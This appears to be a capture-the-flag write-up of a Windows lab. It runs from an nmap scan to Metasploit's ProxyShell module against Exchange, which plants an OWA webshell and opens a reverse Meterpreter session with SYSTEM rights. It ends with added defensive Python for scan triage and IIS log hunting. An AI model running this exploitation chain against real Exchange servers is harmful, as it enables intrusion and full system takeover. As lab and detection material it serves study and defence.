```
# Nmap 7.93 scan initiated Sun Apr 16 21:10:36 2023 as: nmap -sSVC -T4 -p- -v --open --reason -oA nmap lookback.thm
Nmap scan report for lookback.thm (10.10.249.49)
Host is up, received syn-ack ttl 127 (0.028s latency).
Not shown: 65532 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE       REASON          VERSION
80/tcp   open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-title: Site doesn't have a title.
|_http-server-header: Microsoft-IIS/10.0
443/tcp  open  ssl/https     syn-ack ttl 127
|_http-favicon: Unknown favicon MD5: 96AC7779590773AF5357B6E6CB710DDD
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Microsoft-IIS/10.0
| ssl-cert: Subject: commonName=WIN-12OUO7A66M7
| Subject Alternative Name: DNS:WIN-12OUO7A66M7, DNS:WIN-12OUO7A66M7.thm.local
| Issuer: commonName=WIN-12OUO7A66M7
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2023-01-25T21:34:02
| Not valid after:  2028-01-25T21:34:02
| MD5:   84e0805f3667c38fd8204e7c1da04215
|_SHA-1: 08458fd9d9bfc4c648db1f82d3e7324ea92452d7
| http-title: Outlook
|_Requested resource was https://lookback.thm/owa/auth/logon.aspx?url=https%3a%2f%2flookback.thm%2fowa%2f&reason=0
3389/tcp open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: THM
|   NetBIOS_Domain_Name: THM
|   NetBIOS_Computer_Name: WIN-12OUO7A66M7
|   DNS_Domain_Name: thm.local
|   DNS_Computer_Name: WIN-12OUO7A66M7.thm.local
|   DNS_Tree_Name: thm.local
|   Product_Version: 10.0.17763
|_  System_Time: 2023-04-16T19:12:41+00:00
| ssl-cert: Subject: commonName=WIN-12OUO7A66M7.thm.local
| Issuer: commonName=WIN-12OUO7A66M7.thm.local
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-01-25T21:12:51
| Not valid after:  2023-07-27T21:12:51
| MD5:   dce9a0190d34ca2401bdb21574409c9d
|_SHA-1: d55a03f1992df334805947f990eb25be4092cbf0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Apr 16 21:12:46 2023 -- 1 IP address (1 host up) scanned in 130.51 seconds
```
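As an added illustration (not part of the original write-up), the Python below parses nmap's normal output into per-port records and raises the triage findings a defender would pull from this scan: the self-signed, SHA-1-signed certificate on 443, the RDP service on 3389, the OWA endpoint whose Exchange patch level needs confirming, and each certificate's remaining lifetime measured against the scan time. The `SAMPLE` input is constructed from the scan above (trimmed to the lines the parser uses); the 180-day expiry window is an assumption.

```python
"""Parse nmap normal-format (-oN) output into per-port records and raise the
triage findings a defender would take from this scan.

Added example for this write-up, not the author's tooling. SAMPLE is
constructed from the scan shown above; EXPIRY_WINDOW_DAYS is an assumption."""
import re
from datetime import datetime

SAMPLE = """\
PORT     STATE SERVICE       REASON          VERSION
80/tcp   open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
443/tcp  open  ssl/https     syn-ack ttl 127
| ssl-cert: Subject: commonName=WIN-12OUO7A66M7
| Issuer: commonName=WIN-12OUO7A66M7
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2023-01-25T21:34:02
| Not valid after:  2028-01-25T21:34:02
| http-title: Outlook
|_Requested resource was https://lookback.thm/owa/auth/logon.aspx?url=https%3a%2f%2flookback.thm%2fowa%2f&reason=0
3389/tcp open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| ssl-cert: Subject: commonName=WIN-12OUO7A66M7.thm.local
| Issuer: commonName=WIN-12OUO7A66M7.thm.local
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-01-25T21:12:51
| Not valid after:  2023-07-27T21:12:51
"""

# System_Time reported by the rdp-ntlm-info script in the scan above (UTC).
SCAN_TIME = datetime(2023, 4, 16, 19, 12, 41)
EXPIRY_WINDOW_DAYS = 180  # assumption: warn when less than this remains

# port/proto, state, service, reason ("syn-ack ttl N" contains spaces), version
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s+(syn-ack ttl \d+|\S+)\s*(.*)$")


def parse_nmap(text):
    """Return a list of port dicts; NSE 'key: value' lines go into 'scripts',
    free-text script lines into 'notes'."""
    ports, current = [], None
    for raw in text.splitlines():
        m = PORT_RE.match(raw)
        if m:
            current = {"port": int(m.group(1)), "proto": m.group(2), "state": m.group(3),
                       "service": m.group(4), "reason": m.group(5),
                       "version": m.group(6).strip(), "scripts": {}, "notes": []}
            ports.append(current)
            continue
        if current is None or not raw.startswith("|"):
            continue  # header, blank, or summary lines
        body = raw.lstrip("|_ ").strip()
        key, sep, val = body.partition(": ")
        if sep:
            current["scripts"][key] = val.strip()
        else:
            current["notes"].append(body)
    return ports


def assess(ports, scan_time):
    """Return (port-label, issue) tuples for what needs follow-up."""
    findings = []
    for p in ports:
        s, label = p["scripts"], f"{p['port']}/{p['proto']}"
        if p["port"] == 3389 and p["state"] == "open":
            findings.append((label, "RDP exposed to the scanning network; restrict to VPN/jump host"))
        if s.get("http-title") == "Outlook" or any("/owa/" in n for n in p["notes"]):
            findings.append((label, "OWA reachable; confirm the Exchange security update is installed"))
        sig = s.get("Signature Algorithm", "")
        if sig.lower().startswith("sha1"):
            findings.append((label, f"certificate signed with {sig}; reissue with SHA-256"))
        subject = s.get("ssl-cert", "").partition("Subject: ")[2]
        if subject and subject == s.get("Issuer"):
            findings.append((label, "self-signed certificate (subject == issuer)"))
        if "Not valid after" in s:
            days = (datetime.fromisoformat(s["Not valid after"]) - scan_time).days
            if days < 0:
                findings.append((label, f"certificate expired {-days} days ago"))
            elif days <= EXPIRY_WINDOW_DAYS:
                findings.append((label, f"certificate expires in {days} days"))
    return findings


if __name__ == "__main__":
    for port, issue in assess(parse_nmap(SAMPLE), SCAN_TIME):
        print(f"{port:9} {issue}")
```

Run against a real `-oN` file by replacing `SAMPLE` with the file contents; the parser ignores everything that is not a port line or an NSE `|` line, so the full scan above parses unchanged.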
```
PS C:\users\dev\Desktop> cat TODO.txt
Hey dev team,

This is the tasks list for the deadline:

Promote Server to Domain Controller [DONE]
Setup Microsoft Exchange [DONE]
Setup IIS [DONE]
Remove the log analyzer[TO BE DONE]
Add all the users from the infra department [TO BE DONE]
Install the Security Update for MS Exchange [TO BE DONE]
Setup LAPS [TO BE DONE]

When you are done with the tasks please send an email to:

joe@thm.local
carol@thm.local

and do not forget to put in CC the infra team!
dev-infrastracture-team@thm.local
```
## Elevation of Privilege (EoP) - Exchange exploitation
```
   Name              Current Setting                    Required  Description
   ----              ---------------                    --------  -----------
   EMAIL             dev-infrastracture-team@thm.local  no        A known email address for this organization
   Proxies                                              no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS            10.10.249.49                       yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT             443                                yes       The target port (TCP)
   SSL               true                               no        Negotiate SSL/TLS for outgoing connections
   SSLCert                                              no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                                              no        The URI to use for this exploit (default is random)
   UseAlternatePath  false                              yes       Use the IIS root dir as alternate path
   VHOST             win-12ouo7a66m7.thm.local          no        HTTP server virtual host

   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.9.65.100      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows Powershell

View the full module info with the info, or info -d command.
```
```
msf6 exploit(windows/http/exchange_proxyshell_rce) > run

[*] Started reverse TCP handler on 10.9.65.100:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Attempt to exploit for CVE-2021-34473
[*] Retrieving backend FQDN over RPC request
[*] Internal server name: win-12ouo7a66m7.thm.local
[*] Assigning the 'Mailbox Import Export' role via dev-infrastracture-team@thm.local
[+] Successfully assigned the 'Mailbox Import Export' role
[+] Proceeding with SID: S-1-5-21-2402911436-1669601961-3356949615-1144 (dev-infrastracture-team@thm.local)
[*] Saving a draft email with subject 'qJsINJcx' containing the attachment with the embedded webshell
[*] Writing to: C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\5YGhwaT2.aspx
[*] Waiting for the export request to complete...
[+] The mailbox export request has completed
[*] Triggering the payload
[*] Sending stage (200774 bytes) to 10.10.249.49
[+] Deleted C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\5YGhwaT2.aspx
[*] Meterpreter session 1 opened (10.9.65.100:4444 -> 10.10.249.49:17646) at 2023-04-16 23:37:42 +0200
[*] Removing the mailbox export request
[*] Removing the draft email

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```
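The module output above records the artifacts a responder can hunt for after the fact: a randomly named `.aspx` file written under `FrontEnd\HttpProxy\owa\auth\`, requested once to trigger the payload, then deleted. The file is gone, but the request to it survives in the IIS W3C logs. As an added example (not Metasploit's, TryHackMe's or the author's code), the Python below sweeps IIS log text for `.aspx` requests under `/owa/auth/` whose filename is not in a baseline of legitimate pages and summarises each hit. The log lines are constructed to mirror the session above (UTC times, the `5YGhwaT2.aspx` name from the module output); `KNOWN_OWA_AUTH_PAGES` is an assumed baseline that must be built from a clean Exchange install of the same build.

```python
"""Flag requests for unexpected .aspx files under /owa/auth/ in IIS W3C logs.

Added example for this write-up. SAMPLE_LOG is constructed to mirror the
Metasploit session above; KNOWN_OWA_AUTH_PAGES is an assumed baseline and
should be generated from a clean Exchange server of the same build."""
import re

# Assumed baseline of legitimate pages directly under /owa/auth/ (lowercase).
KNOWN_OWA_AUTH_PAGES = {"logon.aspx", "logoff.aspx", "errorfe.aspx"}

# Constructed IIS log excerpt; times are UTC (23:37:42 +0200 in msf == 21:37:42Z).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2023-04-16 21:36:50 10.10.249.49 GET /owa/auth/logon.aspx url=https%3a%2f%2flookback.thm%2fowa%2f&reason=0 443 - 10.9.65.100 Mozilla/5.0+(Windows+NT+10.0) 200
2023-04-16 21:37:41 10.10.249.49 GET /owa/auth/5YGhwaT2.aspx - 443 - 10.9.65.100 Mozilla/5.0+(Windows+NT+10.0) 200
2023-04-16 21:37:42 10.10.249.49 POST /owa/auth/5YGhwaT2.aspx - 443 - 10.9.65.100 Mozilla/5.0+(Windows+NT+10.0) 200
2023-04-16 21:38:05 10.10.249.49 GET /owa/auth/15.1/themes/resources/favicon.ico - 443 - 10.10.1.25 Mozilla/5.0+(Windows+NT+10.0) 200
"""

FIELDS_PREFIX = "#Fields: "
# Only files directly in /owa/auth/; subdirectories hold static theme assets.
ASPX_RE = re.compile(r"^/owa/auth/([^/]+\.aspx)$", re.IGNORECASE)


def parse_w3c(text):
    """Yield one dict per data line, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith(FIELDS_PREFIX):
            fields = line[len(FIELDS_PREFIX):].split()
            continue
        if line.startswith("#") or not line.strip():
            continue
        if fields is None:
            raise ValueError("data line before #Fields header")
        values = line.split(" ")
        if len(values) != len(fields):
            continue  # malformed line: skip rather than abort a whole sweep
        yield dict(zip(fields, values))


def find_unexpected_aspx(text, baseline=KNOWN_OWA_AUTH_PAGES):
    """Return one summary per unexpected .aspx name: hit count, methods,
    client IPs, and first/last timestamp."""
    hits = {}
    for rec in parse_w3c(text):
        m = ASPX_RE.match(rec["cs-uri-stem"])
        if not m or m.group(1).lower() in baseline:
            continue
        name = m.group(1)
        h = hits.setdefault(name, {"file": name, "count": 0, "methods": set(),
                                   "clients": set(), "first": None, "last": None})
        ts = f"{rec['date']} {rec['time']}"
        h["count"] += 1
        h["methods"].add(rec["cs-method"])
        h["clients"].add(rec["c-ip"])
        h["first"] = h["first"] or ts
        h["last"] = ts
    return list(hits.values())


if __name__ == "__main__":
    for h in find_unexpected_aspx(SAMPLE_LOG):
        print(f"{h['file']}: {h['count']} requests {sorted(h['methods'])} "
              f"from {sorted(h['clients'])} between {h['first']} and {h['last']}")
```

A hit here is worth correlating with the other traces the module leaves: a mailbox export request and a role assignment that the session output says are removed afterwards, but which the Exchange admin audit log records independently of the files on disk.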